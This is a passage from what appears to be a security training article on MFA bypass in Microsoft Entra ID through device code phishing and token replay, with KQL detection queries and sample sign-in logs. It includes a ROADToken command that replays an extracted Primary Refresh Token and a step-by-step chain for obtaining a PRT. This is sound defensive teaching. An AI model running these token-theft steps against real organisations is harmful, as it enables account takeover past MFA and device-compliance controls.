16%)\"><span class=\"token plain\"># AzureAdPrtExpiryTime : 2025-01-29 09:23:44.000 UTC</span><br></span></code></pre></div></div>\n<p>With SYSTEM-level access on the machine, an attacker can extract the PRT using tools that read from LSASS or the Windows Credential Manager:</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># ROADToken  defensive research tool for PRT analysis</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Request a new access token using the extracted PRT</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">.\\ROADToken.exe --prt &lt;extracted_prt&gt; --prt-sessionkey &lt;session_key&gt; `</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                --resource https://graph.microsoft.com/</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The resulting access token satisfies device compliance claims</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># even when used from a different machine</span><br></span></code></pre></div></div>\n<p><strong>On Windows 11 with TPM:</strong> The PRT is bound to the TPM chip, making extraction dramatically harder  the private key used to prove PRT possession never leaves the TPM. However, Hyper-V Generation 1 VMs don't have TPM support, cloud-hosted VMs must be explicitly configured with vTPM, and UEFI/BIOS access can disable TPM.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"33-phishing-directly-for-a-prt--the-advanced-technique\">3.3 Phishing Directly for a PRT  The Advanced Technique<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#33-phishing-directly-for-a-prt--the-advanced-technique\" class=\"hash-link\" aria-label=\"Direct link to 3.3 Phishing Directly for a PRT  The Advanced Technique\" title=\"Direct link to 3.3 Phishing Directly for a PRT  The Advanced Technique\" translate=\"no\">​</a></h3>\n<p>Researcher Dirk-jan Mollema documented a technique where device code phishing, combined with device registration, can yield a full PRT:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Attack chain to obtain PRT via device code phishing:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 1: Attacker initiates device code flow for the Windows broker app</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        client_id = 29d9ed98-a469-4536-ade2-f981bc1d605e  (Microsoft broker)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        scope = openid profile offline_access</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 2: Victim completes MFA (fresh MFA claim in the resulting token)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 3: Attacker has refresh token + fresh MFA claim</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 4: Attacker registers a new device to the tenant</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        POST https://login.microsoftonline.com/common/oauth2/v2.0/token</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        {grant_type: refresh_token, scope: \"urn:ms-drs:enterpriseregistration...\"}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 5: With device registered, attacker requests PRT for that device</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        The PRT now carries: valid device_id + MFA claim from step 2</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Step 6: Attacker uses PRT to access ANY resource gated by:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        \"Require MFA\" ✓  (MFA claim from step 2)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        \"Require compliant device\" ✓  (registered device from step 4)</span><br></span></code></pre></div></div>\n<p><strong>KQL query to detect this device registration abuse:</strong></p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect device registration immediately following device code authentication</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let DeviceCodeLogins = SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UserPrincipalName, DeviceCodeTime = TimeGenerated,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              IPAddress, CorrelationId;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let DeviceRegistrations = AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where OperationName == \"Register device\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">       or OperationName == \"Add registered users to device\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | extend UPN = tostring(InitiatedBy.user.userPrincipalName)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UPN, RegistrationTime = TimeGenerated, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              DeviceName = tostring(TargetResources[0].displayName);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">DeviceCodeLogins</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=inner DeviceRegistrations on $left.UserPrincipalName == $right.UPN</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where (RegistrationTime - DeviceCodeTime) between (0min .. 30min)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project UserPrincipalName, DeviceCodeTime, RegistrationTime, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          IPAddress, DeviceName, CorrelationId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by DeviceCodeTime desc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-4--what-entra-id-logs-and-what-it-doesnt\">Part 4  What Entra ID Logs and What It Doesn't<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-4--what-entra-id-logs-and-what-it-doesnt\" class=\"hash-link\" aria-label=\"Direct link to Part 4  What Entra ID Logs and What It Doesn't\" title=\"Direct link to Part 4  What Entra ID Logs and What It Doesn't\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"41-sign-in-log-taxonomy\">4.1 Sign-In Log Taxonomy<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#41-sign-in-log-taxonomy\" class=\"hash-link\" aria-label=\"Direct link to 4.1 Sign-In Log Taxonomy\" title=\"Direct link to 4.1 Sign-In Log Taxonomy\" translate=\"no\">​</a></h3>\n<p>Entra ID produces three sign-in log types, and they are <strong>not equally monitored</strong>:</p>\n<table><thead><tr><th>Log Table</th><th>What It Captures</th><th>Default Retention</th><th>Alert Coverage</th></tr></thead><tbody><tr><td><code>SigninLogs</code></td><td>Interactive sign-ins (browser, client app prompts)</td><td>30 days</td><td>High  most orgs monitor this</td></tr><tr><td><code>NonInteractiveUserSignInLogs</code></td><td>Silent token refreshes (background, refresh_token grants)</td><td>30 days</td><td><strong>Low</strong>  often not ingested into SIEM</td></tr><tr><td><code>ServicePrincipalSignInLogs</code></td><td>App-to-app authentication</td><td>30 days</td><td>Medium</td></tr><tr><td><code>ManagedIdentitySignInLogs</code></td><td>Managed identity token requests</td><td>30 days</td><td>Low</td></tr></tbody></table>\n<p><strong>The critical gap: Token replay most commonly appears in <code>NonInteractiveUserSignInLogs</code>.</strong> When an attacker uses a stolen refresh token to silently obtain new access tokens, this generates entries in that table  not in <code>SigninLogs</code>. Many organizations either don't ingest this table into their SIEM, or don't alert on it with the same rigor.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"42-what-a-device-code-phishing-sign-in-looks-like-in-logs\">4.2 What a Device Code Phishing Sign-In Looks Like in Logs<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#42-what-a-device-code-phishing-sign-in-looks-like-in-logs\" class=\"hash-link\" aria-label=\"Direct link to 4.2 What a Device Code Phishing Sign-In Looks Like in Logs\" title=\"Direct link to 4.2 What a Device Code Phishing Sign-In Looks Like in Logs\" translate=\"no\">​</a></h3>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"UserPrincipalName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"victim@company.com\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AppDisplayName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Office\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"ClientAppUsed\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Mobile Apps and Desktop clients\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AuthenticationProtocol\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"deviceCode\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AuthenticationRequirement\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"singleFactorAuthentication\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"ConditionalAccessStatus\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"success\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"IPAddress\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"185.220.101.x\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"Location\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"City\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Frankfurt\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"CountryOrRegion\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"DE\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"DeviceDetail\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"deviceId\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"displayName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"operatingSystem\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"browser\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"RiskDetail\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"none\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"ResultType\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"0\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p><strong>Key forensic indicators:</strong></p>\n<ul>\n<li class=\"\"><code>AuthenticationProtocol == \"deviceCode\"</code>  the smoking gun</li>\n<li class=\"\"><code>DeviceDetail</code> fields empty  the token was not bound to a registered device</li>\n<li class=\"\"><code>IPAddress</code> belongs to attacker infrastructure, not the victim's known IPs</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"43-what-token-replay-looks-like-in-logs\">4.3 What Token Replay Looks Like in Logs<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#43-what-token-replay-looks-like-in-logs\" class=\"hash-link\" aria-label=\"Direct link to 4.3 What Token Replay Looks Like in Logs\" title=\"Direct link to 4.3 What Token Replay Looks Like in Logs\" translate=\"no\">​</a></h3>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"UserPrincipalName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"victim@company.com\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AppDisplayName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Graph\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AuthenticationProtocol\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"none\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"IsInteractive\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">false</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"IPAddress\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"45.152.x.x\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"Location\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"CountryOrRegion\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"NL\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"TokenIssuerType\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"AzureAD\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"RiskDetail\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"none\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"UniqueTokenIdentifier\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"ZGJhNzQ4...\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p>The attacker's access pattern will show consistent non-interactive sign-ins at regular intervals (token refresh), from a consistent IP (the attacker's server), accessing Microsoft Graph API endpoints not typical for the victim's normal work pattern.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-5--detection-queries-that-actually-work\">Part 5  Detection: Queries That Actually Work<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-5--detection-queries-that-actually-work\" class=\"hash-link\" aria-label=\"Direct link to Part 5  Detection: Queries That Actually Work\" title=\"Direct link to Part 5  Detection: Queries That Actually Work\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"51-detect-device-code-sign-ins-from-unmanaged-contexts\">5.1 Detect Device Code Sign-Ins from Unmanaged Contexts<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#51-detect-device-code-sign-ins-from-unmanaged-contexts\" class=\"hash-link\" aria-label=\"Direct link to 5.1 Detect Device Code Sign-Ins from Unmanaged Contexts\" title=\"Direct link to 5.1 Detect Device Code Sign-Ins from Unmanaged Contexts\" translate=\"no\">​</a></h3>\n<p>The highest-fidelity starting point. Device code flow is rarely legitimate for standard enterprise users:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect device code authentication where no device is registered</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(7d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isempty(DeviceDetail.deviceId)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Country = 